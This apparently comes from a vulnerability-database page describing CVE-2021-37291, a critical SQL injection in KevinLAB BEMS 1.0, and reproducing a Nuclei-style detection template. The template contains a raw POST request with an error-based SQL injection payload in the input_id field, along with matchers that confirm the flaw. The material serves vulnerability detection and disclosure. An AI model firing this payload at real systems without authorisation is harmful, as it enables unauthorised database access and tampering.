CVE-2021-37291: KevinLAB BEMS 1.0 - SQL Injection

日期: 2025-08-01 | 影响软件: KevinLAB BEMS | POC: 已公开

漏洞描述

KevinLAB BEMS 1.0 contains a SQL injection vulnerability. Input passed through input_id POST parameter in /http/index.php is not properly sanitized before being returned to the user or used in SQL queries. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.

PoC代码[已公开]

id: CVE-2021-37291

info:
  name: KevinLAB BEMS 1.0 - SQL Injection
  author: gy741
  severity: critical
  description: |
    KevinLAB BEMS 1.0 contains a SQL injection vulnerability. Input passed through input_id POST parameter in /http/index.php is not properly sanitized before being returned to the user or used in SQL queries. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php
    - https://www.exploit-db.com/exploits/50146
    - https://packetstormsecurity.com/files/163572/
    - https://nvd.nist.gov/vuln/detail/cve-2021-37291
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-37291
    epss-score: 0.60436
    epss-percentile: 0.98184
    cwe-id: CWE-89
    cpe: cpe:2.3:a:kevinlab:4st_l-bems:1.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: kevinlab
    product: 4st_l-bems
  tags: cve,cve2021,kevinlab,sqli,edb,packetstorm,vkev,vuln

http:
  - raw:
      - |
        POST /http/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Accept-Encoding: gzip, deflate

        requester=login&request=login&params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "XPATH syntax error"
          - ": '\\ZSL1ZSL'"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022034a1b787b587130ab699343e2745f98b0b2830c60d71617bbc718858f01c5a67022100ca70618c0fcae822d9c36e8eae768d2025ed1ce103a1faa3aa0e1a2b80fc4eb6:922c64590222798bb761d5b6d8e72950

相关漏洞推荐